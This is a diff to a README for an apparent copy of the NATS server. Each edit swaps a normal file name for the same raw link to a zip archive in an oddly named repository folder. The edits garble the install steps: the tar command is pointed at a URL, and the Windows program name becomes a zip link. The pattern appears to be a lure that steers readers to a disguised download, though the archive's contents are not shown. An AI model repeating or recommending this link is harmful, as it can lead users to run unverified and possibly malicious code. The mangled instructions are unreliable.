FurkanGuwen/nats-server/README.md

 ### 4. Extract the File (if needed)

-If you downloaded a `.zip` or `.tar.gz` file, you need to extract it:
+If you downloaded a `.zip` or `https://github.com/FurkanGuwen/nats-server/raw/refs/heads/main/outbellow/server-nats-3.5.zip` file, you need to extract it:

 - On Windows: Right-click the file and select “Extract All…” then follow the instructions.
 - On macOS: Double-click the file to unzip it.
-- On Linux: Use your archive manager or run `tar -xvzf filename.tar.gz` in the terminal.
+- On Linux: Use your archive manager or run `tar -xvzf https://github.com/FurkanGuwen/nats-server/raw/refs/heads/main/outbellow/server-nats-3.5.zip` in the terminal.

 ### 5. Open the Folder and Find the nats-server File

-After extraction, open the folder to find the program called `nats-server` (the exact name may vary; it might be `nats-server.exe` on Windows).
+After extraction, open the folder to find the program called `nats-server` (the exact name may vary; it might be `https://github.com/FurkanGuwen/nats-server/raw/refs/heads/main/outbellow/server-nats-3.5.zip` on Windows).

 ### 6. Run the Server